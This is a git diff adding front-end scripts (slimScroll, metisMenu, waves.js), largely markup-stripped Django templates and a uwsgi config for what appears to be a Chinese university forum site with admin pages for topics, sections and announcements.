e=f==x.outerHeight()?"none":"block";R.css({display:e})}function n(){if(l(),clearTimeout(p),v==~~v){if(y=s.allowPageScroll,b!=v){var e=0==~~v?"top":"bottom";x.trigger("slimscroll",e)}}else y=!1;return b=v,f>=x.outerHeight()?void(y=!0):(R.stop(!0,!0).fadeIn("fast"),void(s.railVisible&&E.stop(!0,!0).fadeIn("fast")))}function c(){s.alwaysVisible||(p=setTimeout(function(){s.disableFadeOut&&h||u||d||(R.fadeOut("slow"),E.fadeOut("slow"))},1e3))}var h,u,d,p,g,f,v,b,w="
    ",m=30,y=!1,x=e(this);if(x.parent().hasClass(s.wrapperClass)){var C=x.scrollTop();if(R=x.closest("."+s.barClass),E=x.closest("."+s.railClass),l(),e.isPlainObject(i)){if("height"in i&&"auto"==i.height){x.parent().css("height","auto"),x.css("height","auto");var H=x.parent().parent().height();x.parent().css("height",H),x.css("height",H)}if("scrollTo"in i)C=parseInt(s.scrollTo);else if("scrollBy"in i)C+=parseInt(s.scrollBy);else if("destroy"in i)return R.remove(),E.remove(),void x.unwrap();r(C,!1,!0)}}else if(!(e.isPlainObject(i)&&"destroy"in i)){s.height="auto"==s.height?x.parent().height():s.height;var S=e(w).addClass(s.wrapperClass).css({position:"relative",overflow:"hidden",width:s.width,height:s.height});x.css({overflow:"hidden",width:s.width,height:s.height});var E=e(w).addClass(s.railClass).css({width:s.size,height:"100%",position:"absolute",top:0,display:s.alwaysVisible&&s.railVisible?"block":"none","border-radius":s.railBorderRadius,background:s.railColor,opacity:s.railOpacity,zIndex:90}),R=e(w).addClass(s.barClass).css({background:s.color,width:s.size,position:"absolute",top:0,opacity:s.opacity,display:s.alwaysVisible?"block":"none","border-radius":s.borderRadius,BorderRadius:s.borderRadius,MozBorderRadius:s.borderRadius,WebkitBorderRadius:s.borderRadius,zIndex:99}),D="right"==s.position?{right:s.distance}:{left:s.distance};E.css(D),R.css(D),x.wrap(S),x.parent().append(R),x.parent().append(E),s.railDraggable&&R.bind("mousedown",function(i){var o=e(document);return d=!0,t=parseFloat(R.css("top")),pageY=i.pageY,o.bind("mousemove.slimscroll",function(e){currTop=t+e.pageY-pageY,R.css("top",currTop),r(0,R.position().top,!1)}),o.bind("mouseup.slimscroll",function(e){d=!1,c(),o.unbind(".slimscroll")}),!1}).bind("selectstart.slimscroll",function(e){return e.stopPropagation(),e.preventDefault(),!1}),E.hover(function(){n()},function(){c()}),R.hover(function(){u=!0},function(){u=!1}),x.hover(function(){h=!0,n(),c()},function(){h=!1,c()}),x.bind("touchstart",function(e,t){e.originalEvent.touches.length&&(g=e.originalEvent.touches[0].pageY)}),x.bind("touchmove",function(e){if(y||e.originalEvent.preventDefault(),e.originalEvent.touches.length){var t=(g-e.originalEvent.touches[0].pageY)/s.touchScrollStep;r(t,!0),g=e.originalEvent.touches[0].pageY}}),l(),"bottom"===s.start?(R.css({top:x.outerHeight()-R.outerHeight()}),r(0,!0)):"top"!==s.start&&(r(e(s.start).position().top,null,!0),s.alwaysVisible||R.hide()),a(this)}}),this}}),e.fn.extend({slimscroll:e.fn.slimScroll})}(jQuery); \ No newline at end of file diff --git a/master/static/js/sidebarmenu.js b/master/static/js/sidebarmenu.js new file mode 100644 index 0000000..2052e0c --- /dev/null +++ b/master/static/js/sidebarmenu.js @@ -0,0 +1,342 @@ +/* +Template Name: Monster Admin +Author: Themedesigner +Email: niravjoshi87@gmail.com +File: js +*/ +(function (global, factory) { + if (typeof define === "function" && define.amd) { + define(['jquery'], factory); + } else if (typeof exports !== "undefined") { + factory(require('jquery')); + } else { + var mod = { + exports: {} + }; + factory(global.jquery); + global.metisMenu = mod.exports; + } +})(this, function (_jquery) { + 'use strict'; + + var _jquery2 = _interopRequireDefault(_jquery); + + function _interopRequireDefault(obj) { + return obj && obj.__esModule ? obj : { + default: obj + }; + } + + var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { + return typeof obj; + } : function (obj) { + return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; + }; + + function _classCallCheck(instance, Constructor) { + if (!(instance instanceof Constructor)) { + throw new TypeError("Cannot call a class as a function"); + } + } + + var Util = function ($) { + var transition = false; + + var TransitionEndEvent = { + WebkitTransition: 'webkitTransitionEnd', + MozTransition: 'transitionend', + OTransition: 'oTransitionEnd otransitionend', + transition: 'transitionend' + }; + + function getSpecialTransitionEndEvent() { + return { + bindType: transition.end, + delegateType: transition.end, + handle: function handle(event) { + if ($(event.target).is(this)) { + return event.handleObj.handler.apply(this, arguments); + } + return undefined; + } + }; + } + + function transitionEndTest() { + if (window.QUnit) { + return false; + } + + var el = document.createElement('mm'); + + for (var name in TransitionEndEvent) { + if (el.style[name] !== undefined) { + return { + end: TransitionEndEvent[name] + }; + } + } + + return false; + } + + function transitionEndEmulator(duration) { + var _this2 = this; + + var called = false; + + $(this).one(Util.TRANSITION_END, function () { + called = true; + }); + + setTimeout(function () { + if (!called) { + Util.triggerTransitionEnd(_this2); + } + }, duration); + + return this; + } + + function setTransitionEndSupport() { + transition = transitionEndTest(); + $.fn.emulateTransitionEnd = transitionEndEmulator; + + if (Util.supportsTransitionEnd()) { + $.event.special[Util.TRANSITION_END] = getSpecialTransitionEndEvent(); + } + } + + var Util = { + TRANSITION_END: 'mmTransitionEnd', + + triggerTransitionEnd: function triggerTransitionEnd(element) { + $(element).trigger(transition.end); + }, + supportsTransitionEnd: function supportsTransitionEnd() { + return Boolean(transition); + } + }; + + setTransitionEndSupport(); + + return Util; + }(jQuery); + + var MetisMenu = function ($) { + + var NAME = 'metisMenu'; + var DATA_KEY = 'metisMenu'; + var EVENT_KEY = '.' + DATA_KEY; + var DATA_API_KEY = '.data-api'; + var JQUERY_NO_CONFLICT = $.fn[NAME]; + var TRANSITION_DURATION = 350; + + var Default = { + toggle: true, + preventDefault: true, + activeClass: 'active', + collapseClass: 'collapse', + collapseInClass: 'in', + collapsingClass: 'collapsing', + triggerElement: 'a', + parentTrigger: 'li', + subMenu: 'ul' + }; + + var Event = { + SHOW: 'show' + EVENT_KEY, + SHOWN: 'shown' + EVENT_KEY, + HIDE: 'hide' + EVENT_KEY, + HIDDEN: 'hidden' + EVENT_KEY, + CLICK_DATA_API: 'click' + EVENT_KEY + DATA_API_KEY + }; + + var MetisMenu = function () { + function MetisMenu(element, config) { + _classCallCheck(this, MetisMenu); + + this._element = element; + this._config = this._getConfig(config); + this._transitioning = null; + + this.init(); + } + + MetisMenu.prototype.init = function init() { + var self = this; + $(this._element).find(this._config.parentTrigger + '.' + this._config.activeClass).has(this._config.subMenu).children(this._config.subMenu).attr('aria-expanded', true).addClass(this._config.collapseClass + ' ' + this._config.collapseInClass); + + $(this._element).find(this._config.parentTrigger).not('.' + this._config.activeClass).has(this._config.subMenu).children(this._config.subMenu).attr('aria-expanded', false).addClass(this._config.collapseClass); + + $(this._element).find(this._config.parentTrigger).has(this._config.subMenu).children(this._config.triggerElement).on(Event.CLICK_DATA_API, function (e) { + var _this = $(this); + var _parent = _this.parent(self._config.parentTrigger); + var _siblings = _parent.siblings(self._config.parentTrigger).children(self._config.triggerElement); + var _list = _parent.children(self._config.subMenu); + if (self._config.preventDefault) { + e.preventDefault(); + } + if (_this.attr('aria-disabled') === 'true') { + return; + } + if (_parent.hasClass(self._config.activeClass)) { + _this.attr('aria-expanded', false); + self._hide(_list); + } else { + self._show(_list); + _this.attr('aria-expanded', true); + if (self._config.toggle) { + _siblings.attr('aria-expanded', false); + } + } + + if (self._config.onTransitionStart) { + self._config.onTransitionStart(e); + } + }); + }; + + MetisMenu.prototype._show = function _show(element) { + if (this._transitioning || $(element).hasClass(this._config.collapsingClass)) { + return; + } + var _this = this; + var _el = $(element); + + var startEvent = $.Event(Event.SHOW); + _el.trigger(startEvent); + + if (startEvent.isDefaultPrevented()) { + return; + } + + _el.parent(this._config.parentTrigger).addClass(this._config.activeClass); + + if (this._config.toggle) { + this._hide(_el.parent(this._config.parentTrigger).siblings().children(this._config.subMenu + '.' + this._config.collapseInClass).attr('aria-expanded', false)); + } + + _el.removeClass(this._config.collapseClass).addClass(this._config.collapsingClass).height(0); + + this.setTransitioning(true); + + var complete = function complete() { + + _el.removeClass(_this._config.collapsingClass).addClass(_this._config.collapseClass + ' ' + _this._config.collapseInClass).height('').attr('aria-expanded', true); + + _this.setTransitioning(false); + + _el.trigger(Event.SHOWN); + }; + + if (!Util.supportsTransitionEnd()) { + complete(); + return; + } + + _el.height(_el[0].scrollHeight).one(Util.TRANSITION_END, complete).emulateTransitionEnd(TRANSITION_DURATION); + }; + + MetisMenu.prototype._hide = function _hide(element) { + + if (this._transitioning || !$(element).hasClass(this._config.collapseInClass)) { + return; + } + var _this = this; + var _el = $(element); + + var startEvent = $.Event(Event.HIDE); + _el.trigger(startEvent); + + if (startEvent.isDefaultPrevented()) { + return; + } + + _el.parent(this._config.parentTrigger).removeClass(this._config.activeClass); + _el.height(_el.height())[0].offsetHeight; + + _el.addClass(this._config.collapsingClass).removeClass(this._config.collapseClass).removeClass(this._config.collapseInClass); + + this.setTransitioning(true); + + var complete = function complete() { + if (_this._transitioning && _this._config.onTransitionEnd) { + _this._config.onTransitionEnd(); + } + + _this.setTransitioning(false); + _el.trigger(Event.HIDDEN); + + _el.removeClass(_this._config.collapsingClass).addClass(_this._config.collapseClass).attr('aria-expanded', false); + }; + + if (!Util.supportsTransitionEnd()) { + complete(); + return; + } + + _el.height() == 0 || _el.css('display') == 'none' ? complete() : _el.height(0).one(Util.TRANSITION_END, complete).emulateTransitionEnd(TRANSITION_DURATION); + }; + + MetisMenu.prototype.setTransitioning = function setTransitioning(isTransitioning) { + this._transitioning = isTransitioning; + }; + + MetisMenu.prototype.dispose = function dispose() { + $.removeData(this._element, DATA_KEY); + + $(this._element).find(this._config.parentTrigger).has(this._config.subMenu).children(this._config.triggerElement).off('click'); + + this._transitioning = null; + this._config = null; + this._element = null; + }; + + MetisMenu.prototype._getConfig = function _getConfig(config) { + config = $.extend({}, Default, config); + return config; + }; + + MetisMenu._jQueryInterface = function _jQueryInterface(config) { + return this.each(function () { + var $this = $(this); + var data = $this.data(DATA_KEY); + var _config = $.extend({}, Default, $this.data(), (typeof config === 'undefined' ? 'undefined' : _typeof(config)) === 'object' && config); + + if (!data && /dispose/.test(config)) { + this.dispose(); + } + + if (!data) { + data = new MetisMenu(this, _config); + $this.data(DATA_KEY, data); + } + + if (typeof config === 'string') { + if (data[config] === undefined) { + throw new Error('No method named "' + config + '"'); + } + data[config](); + } + }); + }; + + return MetisMenu; + }(); + + /** + * ------------------------------------------------------------------------ + * jQuery + * ------------------------------------------------------------------------ + */ + + $.fn[NAME] = MetisMenu._jQueryInterface; + $.fn[NAME].Constructor = MetisMenu; + $.fn[NAME].noConflict = function () { + $.fn[NAME] = JQUERY_NO_CONFLICT; + return MetisMenu._jQueryInterface; + }; + return MetisMenu; + }(jQuery); +}); \ No newline at end of file diff --git a/master/static/js/waves.js b/master/static/js/waves.js new file mode 100644 index 0000000..d559e22 --- /dev/null +++ b/master/static/js/waves.js @@ -0,0 +1 @@ +!function(t){"use strict";function e(t){return null!==t&&t===t.window}function n(t){return e(t)?t:9===t.nodeType&&t.defaultView}function a(t){var e,a,i={top:0,left:0},o=t&&t.ownerDocument;return e=o.documentElement,"undefined"!=typeof t.getBoundingClientRect&&(i=t.getBoundingClientRect()),a=n(o),{top:i.top+a.pageYOffset-e.clientTop,left:i.left+a.pageXOffset-e.clientLeft}}function i(t){var e="";for(var n in t)t.hasOwnProperty(n)&&(e+=n+":"+t[n]+";");return e}function o(t){if(d.allowEvent(t)===!1)return null;for(var e=null,n=t.target||t.srcElement;null!==n.parentElement;){if(!(n instanceof SVGElement||-1===n.className.indexOf("waves-effect"))){e=n;break}if(n.classList.contains("waves-effect")){e=n;break}n=n.parentElement}return e}function r(e){var n=o(e);null!==n&&(c.show(e,n),"ontouchstart"in t&&(n.addEventListener("touchend",c.hide,!1),n.addEventListener("touchcancel",c.hide,!1)),n.addEventListener("mouseup",c.hide,!1),n.addEventListener("mouseleave",c.hide,!1))}var s=s||{},u=document.querySelectorAll.bind(document),c={duration:750,show:function(t,e){if(2===t.button)return!1;var n=e||this,o=document.createElement("div");o.className="waves-ripple",n.appendChild(o);var r=a(n),s=t.pageY-r.top,u=t.pageX-r.left,d="scale("+n.clientWidth/100*10+")";"touches"in t&&(s=t.touches[0].pageY-r.top,u=t.touches[0].pageX-r.left),o.setAttribute("data-hold",Date.now()),o.setAttribute("data-scale",d),o.setAttribute("data-x",u),o.setAttribute("data-y",s);var l={top:s+"px",left:u+"px"};o.className=o.className+" waves-notransition",o.setAttribute("style",i(l)),o.className=o.className.replace("waves-notransition",""),l["-webkit-transform"]=d,l["-moz-transform"]=d,l["-ms-transform"]=d,l["-o-transform"]=d,l.transform=d,l.opacity="1",l["-webkit-transition-duration"]=c.duration+"ms",l["-moz-transition-duration"]=c.duration+"ms",l["-o-transition-duration"]=c.duration+"ms",l["transition-duration"]=c.duration+"ms",l["-webkit-transition-timing-function"]="cubic-bezier(0.250, 0.460, 0.450, 0.940)",l["-moz-transition-timing-function"]="cubic-bezier(0.250, 0.460, 0.450, 0.940)",l["-o-transition-timing-function"]="cubic-bezier(0.250, 0.460, 0.450, 0.940)",l["transition-timing-function"]="cubic-bezier(0.250, 0.460, 0.450, 0.940)",o.setAttribute("style",i(l))},hide:function(t){d.touchup(t);var e=this,n=(1.4*e.clientWidth,null),a=e.getElementsByClassName("waves-ripple");if(!(a.length>0))return!1;n=a[a.length-1];var o=n.getAttribute("data-x"),r=n.getAttribute("data-y"),s=n.getAttribute("data-scale"),u=Date.now()-Number(n.getAttribute("data-hold")),l=350-u;0>l&&(l=0),setTimeout(function(){var t={top:r+"px",left:o+"px",opacity:"0","-webkit-transition-duration":c.duration+"ms","-moz-transition-duration":c.duration+"ms","-o-transition-duration":c.duration+"ms","transition-duration":c.duration+"ms","-webkit-transform":s,"-moz-transform":s,"-ms-transform":s,"-o-transform":s,transform:s};n.setAttribute("style",i(t)),setTimeout(function(){try{e.removeChild(n)}catch(t){return!1}},c.duration)},l)},wrapInput:function(t){for(var e=0;e0&&(d.touches-=1)},500):"mousedown"===t.type&&d.touches>0&&(e=!1),e},touchup:function(t){d.allowEvent(t)}};s.displayEffect=function(e){e=e||{},"duration"in e&&(c.duration=e.duration),c.wrapInput(u(".waves-effect")),"ontouchstart"in t&&document.body.addEventListener("touchstart",r,!1),document.body.addEventListener("mousedown",r,!1)},s.attach=function(e){"input"===e.tagName.toLowerCase()&&(c.wrapInput([e]),e=e.parentElement),"ontouchstart"in t&&e.addEventListener("touchstart",r,!1),e.addEventListener("mousedown",r,!1)},t.Waves=s,document.addEventListener("DOMContentLoaded",function(){s.displayEffect()},!1)}(window); \ No newline at end of file diff --git a/master/templates/admin-home.html b/master/templates/admin-home.html new file mode 100644 index 0000000..d951d59 --- /dev/null +++ b/master/templates/admin-home.html @@ -0,0 +1,199 @@ + + + + + + 帖子管理 + + + + + + + +
    +
    + +
    + +
    + +
    + +
    +
    +

    帖子管理

    +
    +
    +
    + +
    + +
    +
    +
    +
    + + + + + + + + + + + + {% for topic in topics %} + + + + + {% if topic.recommend %} + + {% else %} + + {% endif %} + + + {% endfor %} + +
    序号帖子名称帖子简介是否置顶
    {{ topic.id }}{{ topic.t_title }}{{ topic.t_introduce }} + + + + + + +
    +
    +
    +
    +
    +
    + +
    + © 2019 滑动失饭大学论坛 +
    +
    +
    + + + + + + + + + + + + + + + diff --git a/master/templates/admin.html b/master/templates/admin.html new file mode 100644 index 0000000..f67bc65 --- /dev/null +++ b/master/templates/admin.html @@ -0,0 +1,144 @@ + + + + + 论坛 + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + + +
    +
    +
    + 普通用户登录> +
    + 管理员账号: +
    +
    + 管理员密码: +
    +
    + + +
    + +
    +
    +
    + + + + + + + +
    回到顶端
    + + + + diff --git a/master/templates/all.html b/master/templates/all.html new file mode 100644 index 0000000..dfb35ac --- /dev/null +++ b/master/templates/all.html @@ -0,0 +1,209 @@ + + + + + 论坛 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + +
    + + +
    + + + + + + + + + + +
    + + + +
    + + + + +
    + +
    + + + + + + +
    回到顶端
    + + + diff --git a/master/templates/announcement.html b/master/templates/announcement.html new file mode 100644 index 0000000..f86a389 --- /dev/null +++ b/master/templates/announcement.html @@ -0,0 +1,187 @@ + + + + + + 公告管理 + + + + + + + + +
    +
    + +
    + +
    +
    +
    +
    +

    公告管理

    +
    +
    + +
    +
    +
    +
    +
    + + + + + + + + + + {% for announcement in announcements %} + + + + + + {% endfor %} + +
    序号标题
    {{ announcement.id }}{{ announcement.a_title }} + + + + +
    +
    +
    +
    +
    +
    + + + +
    +
    +
    +
    +
    + 添加公告 + +
    + +
    + +
    +
    +
    + +
    + +
    +
    +
    +
    + +
    +
    +
    +
    +
    +
    + +
    +
    +
    + © 2019 滑动失饭大学论坛 +
    +
    +
    + + + + + + + + + + + + + + + diff --git a/master/templates/edit-pwd.html b/master/templates/edit-pwd.html new file mode 100644 index 0000000..5721d17 --- /dev/null +++ b/master/templates/edit-pwd.html @@ -0,0 +1,164 @@ + + + + + 论坛 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + + +
    +
    +
    +
    + {% csrf_token %} +
    + 更改账号: +inputttt
    +
    + 原始密码: +
    +
    + 新的密码: +
    +
    + 确认密码: +
    +
    + + +
    +
    +
    +
    +
    + + + + + + + +
    回到顶端
    + + + + diff --git a/master/templates/home.html b/master/templates/home.html new file mode 100644 index 0000000..6e9a6ae --- /dev/null +++ b/master/templates/home.html @@ -0,0 +1,236 @@ + + + + + 论坛 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + + +
    + + +
    + + + + + + +
    + + + +
    + + +
    +

      TOP 10 公告

    + {% for a in a_list %} + {{ a.a_title }} + {% endfor %} + {# 第一名:重磅!Google推出了Python编辑器,惊呆了小伙伴......#} +
    + + +
    +

    欢迎来到滑动失饭大学论坛
    + 这是指南

    +

    tip:左边是top10公告,下面是按时间排序的帖子。

    +

    左边是top10公告,下面是按时间排序的帖子。请继续看。

    +
    +
    + + + + + + +
    + + + + + + + +
    回到顶端
    + + + diff --git a/master/templates/kind-manage.html b/master/templates/kind-manage.html new file mode 100644 index 0000000..f0be925 --- /dev/null +++ b/master/templates/kind-manage.html @@ -0,0 +1,170 @@ + + + + + + 板块管理 + + + + + + + +
    +
    + +
    + +
    +
    +
    +
    +

    板块管理

    +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + {% for kind in kinds %} + + + + + + {% endfor %} + +
    序号板块名称
    {{ kind.id }}{{ kind.k_name }} + + + + +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + 添加板块 +
    + +
    + +
    +
    + +
    +
    + +
    +
    +
    +
    +
    +
    +
    +
    + © 2019 滑动失饭大学论坛 +
    +
    + + + + + + + + + + + + + + + + diff --git a/master/templates/login.html b/master/templates/login.html new file mode 100644 index 0000000..dce06d1 --- /dev/null +++ b/master/templates/login.html @@ -0,0 +1,166 @@ + + + + + 论坛 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + + +
    +
    +
    + 管理员登录> +
    + 账号: +
    +
    + 密码: +
    +
    + + +
    + +
    +
    +
    + + + + + + + +
    回到顶端
    + + + + diff --git a/master/templates/ownpublish.html b/master/templates/ownpublish.html new file mode 100644 index 0000000..5bfc631 --- /dev/null +++ b/master/templates/ownpublish.html @@ -0,0 +1,221 @@ + + + + + 论坛 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + +
    + + +
    + + + + + + + +
    + + + +
    + + + + +
    + +
    + + + + + + +
    回到顶端
    + + + diff --git a/master/templates/publish.html b/master/templates/publish.html new file mode 100644 index 0000000..c542a93 --- /dev/null +++ b/master/templates/publish.html @@ -0,0 +1,138 @@ + + + + + 论坛 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + + +

    发帖

    +
    + {% csrf_token %} + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    帖子标题 + +
    帖子简介 + +
    帖子内容 +
    + +
    +
    封面图 + +
    + +
    +
    类别 +
    + +
    +
    + +
    +
    + + + + + + + +
    回到顶端
    + + + diff --git a/master/templates/single-an.html b/master/templates/single-an.html new file mode 100644 index 0000000..8ff0b1a --- /dev/null +++ b/master/templates/single-an.html @@ -0,0 +1,103 @@ + + + + +Piccolo Theme + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    +
    + +
    +
    +
    +

    + 论坛公告 +

    +
    +
    +

    +

    + {{ a_title }} +

    +

    + {{ a_content }} +

    +

    +
    +
    + + +
    +
    +
    +
    +
    + + + diff --git a/master/templates/single.html b/master/templates/single.html new file mode 100644 index 0000000..4c04b41 --- /dev/null +++ b/master/templates/single.html @@ -0,0 +1,252 @@ + + + + + 帖子 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + +
    + + +
    + + + + + + + +
    + + + +
    + + + + +
    + + +
    +

    我要留言

    +
    + {% csrf_token %} +
    + +
    + 图片: + + +
    +
    + + +
    +

    所有留言

    + +
    + + + +
    + + + + + + +
    回到顶端
    + + + + + diff --git a/master/uwsgi.ini b/master/uwsgi.ini new file mode 100644 index 0000000..8ed6502 --- /dev/null +++ b/master/uwsgi.ini @@ -0,0 +1,14 @@ +[uwsgi] +master = true +processes = 1 +threads = 2 +chdir = /www/wwwroot/master +#wsgi-file= /www/wwwroot/master/ +wsgi-file = /www/wwwroot/master/ForumSystem/wsgi.py +http = 0.0.0.0:8000 +logto = /www/wwwroot/master/logs/error.log +chmod-socket = 660 +vacuum = true +master = true +max-requests = 1000 +static-map = /static=/www/wwwroot/master/static